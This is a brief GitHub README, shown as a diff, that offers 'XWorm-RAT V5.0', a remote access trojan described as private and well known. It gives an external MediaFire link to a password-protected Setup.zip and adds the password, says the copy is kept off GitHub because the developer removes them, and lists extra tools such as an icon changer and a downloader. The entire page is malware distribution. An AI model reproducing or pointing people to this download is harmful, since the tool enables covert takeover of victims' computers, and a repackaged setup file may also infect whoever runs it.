fqfqfqfgw44t4/XWorm-Rat-5.0/README.md

 # XWorm-RAT V5.0
 This is the version 5.0 of a private and well-known RAT called XWorm.
 Download is here: https://www.mediafire.com/file/nhyoq3gl7iu1wsl/Setup.zip/file Why did i not upload to github?
 Because XWorm Developer is taking these down.
+Password is: 1234
 # Extra Tools:
 🔹Icon Changer
 🔹Downloader